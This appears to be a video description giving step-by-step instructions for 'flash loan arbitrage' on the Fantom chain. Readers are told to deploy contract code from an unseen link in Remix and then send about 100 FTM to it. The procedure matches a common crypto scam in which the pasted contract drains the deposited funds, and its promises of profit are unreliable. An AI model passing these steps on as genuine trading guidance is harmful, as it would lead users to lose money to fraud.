Flash loans are a type of uncollateralized lending that have become very popular in decentralized finance (DeFi). While they’ve proved popular, flash loan exploits have been used to attack vulnerable DeFi protocols and steal millions of dollars.
In this video we perform flash loan arbitrage on the Fantom FTM Chain.
We’ll deploy a new smart contract to the Fantom FTM Chain using remix and swap tokens on Pancakeswap and Uniswap.
A flash loan has to be borrowed and repaid within the same blockchain transaction.
Setup Metamask to connect to Fantom Opera –
Remix Link –
Flash Loan Explanation –
USD to FTM –
Step By Step Tutorial for Flash Loan:
1. Get the Metamask Extension for your browser
2. Open Remix:
3. Click on File Explorers and click “Create New File “.
4. Name the file ftmFlashloan.sol and paste the contract code link below.
5. Click on Deploy & Run transactions and set “ENVIRONMENT” to Injected Web3.
6. Connect your MetaMask wallet.
7. Click on the “Solidity Compiler” and set the compiler version to 0.5.16
8. Click on the Solidity Compiler and then click the blue button “Compile ftmFlashloan.sol”
9. Wait for the code to compile.
10. Click the arrow down on the “CONTRACT” and select “InitiateFlashLoan – ftmFlashloan.sol”
11. Click on Deploy & run transactions then click on the down arrow right from the “Deploy” button
12. On “_TOKENNAME” TokenOne
13. On “_TOKENSYMBOL” TOK
14. On “_LOANAMOUNT” 10000
15. Click Transact and confirm the transaction in MetaMask.
16. Wait for the transaction to confirm.
17. Copy the address of the newly deployed contract.
18. Send FTM to the deployed contract to initiate the swap 98 FTM (110 FTM up is better as you will get a bigger amount in each swap)
19. Wait for the transaction to confirm.
20. Now, Click “flashloan” (red box) to execute the Flash Loan.
21. Confirm the transaction in MetaMask and wait for the confirmation.
22. You can now check your wallet
Note: if it doesn’t work with 98 FTM try to send another 100 FMT (110 FTM is better), because fees may be different from day to day. (100 FTM for each 10000 FTM you are borrowing)